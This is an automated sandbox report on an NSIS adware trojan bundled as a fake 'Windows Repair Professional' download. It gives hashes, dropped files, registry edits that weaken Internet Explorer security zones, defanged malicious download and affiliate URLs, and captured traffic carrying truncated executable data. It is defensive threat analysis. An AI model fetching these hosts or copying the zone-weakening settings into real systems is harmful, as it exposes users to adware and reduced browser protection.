Trojan.NSIS.StartPage_def705210c

by malwarelabrobot on August 14th, 2015 in Malware Descriptions.

not-a-virus:AdWare.Win32.AdLoad.erjk (Kaspersky), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: def705210ccd222720617c001d355d6e
SHA1: e10afc3fb2fa17020df1dc07a1f2a60f5630c6af
SHA256: 5373f1ef8512636223fc658a30724f696cf471cccf354cf4d73f4007d6a9b163
SSDeep: 12288:ydOv5jKhsfoPA yeVKUCUxP4C902bdRtJJPipFT6sEUigDkJ:ydq5TfcdHj4fmbCynEkJ
Size: 606131 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: OXQCN
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

NojM0TDHJX.exe:1980
%original file name%.exe:1616
cpSetup.exe:568

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process NojM0TDHJX.exe:1980 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (1778 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\1119458637 (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\BgWorker.dll (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp\cpSetup.exe (4805 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn5.tmp (0 bytes)

The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\S (179 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe (8278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp\NSISdl.dll (14 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (0 bytes)

The process cpSetup.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IDELG32N\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00075542.a (1690 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4BSXI3UX\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Q3O76FGN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00074d91.a (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx7.tmp (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GNSBSD4B\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx8.tmp (0 bytes)

Registry activity

The process NojM0TDHJX.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 64 0C 52 E7 45 47 39 B5 A1 0E DB 47 CB 74 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "83 EC 84 9D 20 C2 B7 54 FE 10 CF EE 5B 8C DB 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:568 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 05 05 B2 D0 2E A7 87 C1 BB E1 4E E3 6B C7 16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
8ec3a46db0f5d311571b3c0c62dc0d05 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00074d91.a
e8f5383b782fee176aff1ff243f1f501 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\00075542.a
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NSISdl.dll
905d7368f8c25e0b12e6c5c1e036e7b7 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\NojM0TDHJX.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\System.dll
33ec04738007e665059cf40bc0f0c22b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\BgWorker.dll
a5f8399a743ab7f9c88c645c35b1ebb5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\NSISdl.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\System.dll
30741f682e9d12149beb9266fb790426 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\cpSetup.exe
6206b94f91e92b7f7f72214c438dd414 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsArray.dll
c10e04dd4ad4277d5adc951bb331c777 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsn5.tmp\nsDialogs.dll
0309822592797cc6d1052d2735f20065 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx8.tmp\30ceeaa8-d617-448d-b9f9-8d4d26b32e50.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 45048 45056 2.26212 5fffcf2497e851763fd62f4eee795079

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe
hxxp://d1gahxamcuu9d3.cloudfront.net/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA 52.17.177.26
hxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA 54.239.168.162
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.239.168.162
hxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.88.21.193
hxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 54.239.168.162
hxxp://get.fc-gosh.biz/launch_reb.php?p=sevenzip&tid=4272132&pid=735&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChBbGwgSW4gT25lKSAzLjIuMiArIFBvcnRhYmxlICsgU2VyaWFs&b_typ=pe 54.239.168.254
hxxp://dl.fripp54.xyz/stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial 54.239.168.173
hxxp://capital.go2cloud.orghxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA 52.17.177.26
hxxp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%20Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSetup&appVersion=2.92&instId=11 54.239.168.42
hxxp://tap.winre.xyz/launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 54.239.168.70
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.239.168.162
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA 54.239.168.162
hxxp://up.int-cp-234.xyzhxxp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 54.239.168.162
hxxp://up.int-cp2-234.xyzhxxp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA 54.88.21.193


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake FireFox Version 2.

Traffic

GET hXXp://up.int-cp-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA&id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57 HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 409128
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:51 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 3AgamjltkJULGHtW2r49AY2gNqm91hyzrbUxeYApaBL7338gzXHjPw==
.!.:M.(........FKz)N..8..7.\...... ....bT......#....._......_h....`...
.9K....w..f......o&.].fg..z%..6....m....B..,.L.A....p........F.zN.....
.N.W....).H.,\......Qe....M....-.2........d...D.H.r'!.t6].|.....Y.:u.0
.p....n.8...w$.T.)....0.'fs.........(......8b69....-.p...Ee...\..o...[
.X...e.e.i./.C...Qhd..nMyO.EH2F.E.M.N..?.<'...(t...Vw...L.]...<.
...].c...u*/.9...G.W.;..~.f.&L6...".5.T~s.V.=..#hM5v7.e/A#.q..n.e.K..S
....E..t../..(.w.......-..NEfg3...D.`...P..#w.p..=);.J$Vs.g..._.Lb..t.
q..._...r.].......J.-.7'...*....zB...: ...e.gY}3^4.TA.jv..l..~)][email protected]
[email protected].#.9xD..F.>.D...qS~.i...3...%....~...."z.x...
Ww.....)1.I.vQ8}...UC...3 V..;[email protected] ?........!AH...I..=.g.....
.[.Pog.u. .6.!|h.@Xe.&3eI.....R..s.2.==|1..$.u".....}.........E....o..
E....O.r.....T0....R....Y.'...$......q.c...kf......j....&..M>E....U
.(....48h.Y.8..og........I.V.z....7..U..E|..(..\....T)H.<wZ..V..gm.
...jY.T...Xu.]y....{-..2..8.l....`.......a.I". w.YR.g.......C.........
..N.-..........Zet7y.`...()..#Hv..)...^?.t..^.Vx..YS;..!.l.W43]L!#d{.F
..[T......Y...Q.,.......#_z.j..o%.*[email protected].^.......|.
s..e..!.a.j`...'..un.S.......GQf.!..is/..;l..1o.J<2 4..[.3...E..ip.
"..4....h8....LX...l.........s....?..?...4v#.h....IM.nW..4...hX.%9....
.'..r?aw.90...t.y..V.p....jN......?...p.|K[a.n..s?v.*..Pl..%......b...
.^p..]0.\i..naq9..|.x. .p(....:[email protected]_<..R........^....tW..|
P%3....Y'=...(...../"..#b.......`"eam.d.4..Z.9.|...K... ..7.o.nS.G..$9
s.(...........NI........n.......G.F.o.]UH...hG).......\r.On4..p..b
<<< skipped >>>


GET hXXp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=735&aff_sub2=4272132&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.int-cp-234.xyz/offer.php?affId={aff_id}&trackingId=874446&instId=11&ho_trackingid={transaction_id}&cc=UA HTTP/1.1
Host: capital.go2cloud.org
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 13 Aug 2015 00:45:52 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA
P3P: CP="NOI CUR OUR NOR INT"
Pragma: no-cache
Server: nginx/1.7.9
Set-Cookie: enc_aff_session_4=ENC02414-102e22fe3dd0a0bd118638fce028d4-1006-4-0-0-0-0-UA-2-3131-373335-34323732313332-30-30-30-193.138.244.231-20150812204552-_-7B11052C012208017E2C3146051A2D427132034F4D51525A1C494616244946210D1A4E041130124B55; expires=Sat, 12 Sep 2015 00:45:52 GMT; path=/;
Set-Cookie: ho_mob=eyJtb2JpbGVfZGV2aWNlX29zIjoiRGVza3RvcCIsIm1vYmlsZV9kZXZpY2VfbW9kZWwiOiJGaXJlZm94IiwibW9iaWxlX2RldmljZV9icmFuZCI6Ik1vemlsbGEiLCJtb2JpbGVfYnJvd3NlciI6IkZpcmVmb3ggRGVza3RvcCIsIm1vYmlsZV9icm93c2VyX3ZlcnNpb24iOiIyLjAiLCJtb2JpbGVfY2FycmllciI6Ij8iLCJ1c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNS4xOyBGcjsgUnY6MS44LjEuMykgR2Vja28vMjAwNzAzMDkgRmlyZWZveC8yLjAuMC4zIiwiY29ubmVjdGlvbl9zcGVlZCI6ImJyb2FkYmFuZCJ9; expires=Sat, 07 Jul 2018 11:25:52 GMT; path=/;
tracking_id: 102e22fe3dd0a0bd118638fce028d4
X-Robots-Tag: noindex, nofollow
Content-Length: 324
Connection: Close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874
446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&
;cc=UA">here</a>.</p>.</body></html>...
<<< skipped >>>


POST hXXp://up.int-cp2-234.xyz/installer.php?affId=1006&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&trackingId=874446&cc=UA HTTP/1.1
Host: up.int-cp2-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3
Content-Type: application/x-www-form-urlencoded

id[]=29&id[]=34&id[]=35&id[]=36&id[]=37&id[]=38&id[]=39&id[]=40&id[]=41&id[]=42&id[]=43&id[]=44&id[]=45&id[]=46&id[]=47&id[]=48&id[]=49&id[]=50&id[]=51&id[]=52&id[]=53&id[]=54&id[]=55&id[]=56&id[]=57
HTTP/1.1 411 Length Required
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: Thu, 13 Aug 2015 00:45:50 GMT
Connection: close
Content-Length: 344
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""hXXp://VVV.w3.org
/TR/html4/strict.dtd">..<HTML><HEAD><TITLE>Length
 Required</TITLE>..<META HTTP-EQUIV="Content-Type" Content="t
ext/html; charset=us-ascii"></HEAD>..<BODY><h2>Le
ngth Required</h2>..<hr><p>HTTP Error 411. The reque
st must be chunked or have a content length.</p>..</BODY>&
lt;/HTML>....



GET hXXp://up.int-cp-234.xyz/offer.php?affId=1006&trackingId=874446&instId=11&ho_trackingid=102e22fe3dd0a0bd118638fce028d4&cc=UA HTTP/1.1
Host: up.int-cp-234.xyz
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3


HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 28712
Connection: close
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Thu, 13 Aug 2015 00:45:50 GMT
X-Cache: Miss from cloudfront
Via: 1.1 affe26bf02a36a4a45ea1eb3ce2b4a62.cloudfront.net (CloudFront)
X-Amz-Cf-Id: CHp6udWsvm6AJ4HQDfzA_lXU5e5L8IiqwlpdvQBL11cRTsy-wygohQ==
B=.#...]...5<..{wU..........H.....U.M.VW.c.x.4J...:v..U..s\#...^...
...-O ..v..d...~.!x...9.[...).y.:...)<G.!]......E....j[....,...K...
..b...--E.Y.Ib'..o....W./...za.ba0..:....)y1t_.B..s.y...pMRf.*.t.y....
....T.T.R.9\.U`....KAe.....................H].."W.V."{JBJ............f
...^.....>.....f.d...[L;........P.U..Vm.....z|.t....;.w...9..(..e..
.Z......r5M.QU.. g.y......r.....q....5..m...;7q...6.....WB.F..........
SS....n.....9...._$......:..it. ..~..B.._........|.X3.d..<..0......
..T..4.2..#Y&,....Ak......C.O.5....9......5.&...G/.|..`.k.^2..t...#...
B13:.9.[U$.82.H......N..z.w.;.T../.(V|.?...m.X..q.~......{...........q
..*...giu.........U.R.>.>.9G..w....UB@_r|J...... .>R(....SHo.
.....X....O....j..R.QW....H.hQ..,9....8.<b.r.C.T..*9...F.4..q...%&g
t;h...o3..P.kp .A...N?.$.(?....,[email protected]..#[....2
A]mi...c..{..g..u.... .$:?d.T_..80uQ...1&....tP....w.:.$.."..c.B.*..4.
.^.:...4aW..9]...a.....3:0.........U,..%.|.M.a#s... ......'xl..7P...P.
`........b..[."...J...[S.....y..Bx.........(..m....l... .....IW..4....
.U~b.....rq.`.."..1.J.. ....3.]u..N[.T8.$..W.V..\/......G `4..F.....S.
.......p}.&...A.....An..W....F a....`.>.......5..'.X.g!9...Q..#=..&
lt;...V.c?....P{...I.8.<~ds.N.S........*[email protected]$....U.G.........._X
.vS.`&.,..._&... =6f..M.j .E......*./.hF.I....g....,w...G.YVP... ..6..
5.e.....c....B../.-...g.'..{..e.]................t..t..i=....*....WB`.
t*.....V..u^.&......L..Q\Q..S .62...2G.*..1e2e.ng..._......$.[H.......
h.....[..rN2U..!.=..-........2...h.;..S.D....>...`...\.S.z....7
<<< skipped >>>


GET /stub_maker.php?program=sevenzip&tid=4272132&pid=735&b_typ=pe&reb=1&name=Windows Repair Professional (All In One) 3.2.2 + Portable + Serial HTTP/1.0
Host: dl.fripp54.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: application/force-download
Content-Length: 76885
Connection: close
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.28
Content-Disposition: attachment; filename="55cbe8acafcad.exe"
X-Powered-By: ASP.NET
Date: Thu, 13 Aug 2015 00:45:33 GMT
X-Cache: Miss from cloudfront
Via: 1.1 de7a549023f0ea5ae15f58d27aeb67c7.cloudfront.net (CloudFront)
X-Amz-Cf-Id: z8nqj6gQgmuWKT9oAIJTJr8kmfMfy_E9gLa5dRx5WTeY2Vba9TMkZg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................\..........<2.......p....@......
....................................................................s.
..........@...........................................................
................p...............................text...ZZ.......\.....
............. ..`.rdata.......p.......`..............@[email protected]........
[email protected]...@[email protected]
[email protected]..............@..@.................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
.....>[email protected].>[email protected].
P.u...Pr@..}[email protected]... M.......M....3.....FQ.....N
U..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected]@[email protected] [email protected]..
.\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i.....
.D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>


GET /launch_v5.php?p=sevenzip&pid=735&tid=4272132&b_typ=pe&n=V2luZG93cyBSZXBhaXIgUHJvZmVzc2lvbmFsIChB&reb=1 HTTP/1.0
Host: tap.winre.xyz
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 2322
Connection: close
Date: Thu, 13 Aug 2015 00:45:46 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 15191055e43ba835d0fead01ae84015c.cloudfront.net (CloudFront)
X-Amz-Cf-Id: e2PKLPDCLOe9qGBiUN-s8dMvvEQm5jyb7gjuvI2-p-s-0xCQqXSOzg==
files=4.t1=dl.u1=hXXp://get.cp-retr.xyz/?affId=1006&appTitle=Windows%2
520Repair%20Professional%20%28A&s1=735&s2=4272132&setupName=cpSe
tup&appVersion=2.92&instId=11.n1=cpSetup.exe.b1=cp.c1=sevenzip-1.s1=0.
m1=0.d1=0.t2=dl.u2=hXXp://stapi.sweetcomet.com/api/stamp/setup.exe?&af
filiateid=1780&productname=Windows%20Repair%20Professional%20%
28A&producturl=http://d3pccup19xda2t.cloudfront.net/sevenzip-s
etup-ap.exe&productimage=http://d3pccup19xda2t.cloudfront.net/
pe/szip_pub.png&productversion=9.20&producteula=http://sevenzi
p.info/terms.html&productsize=1.06MB&productcmd=s&publishercontac
t=http://sevenzip.info&productbusiness=sd,se,ad,co,prm%2
Cwsa,ita,serp,bro&antivirusPolicy=2&subid=735&subid2=4272132.n2=
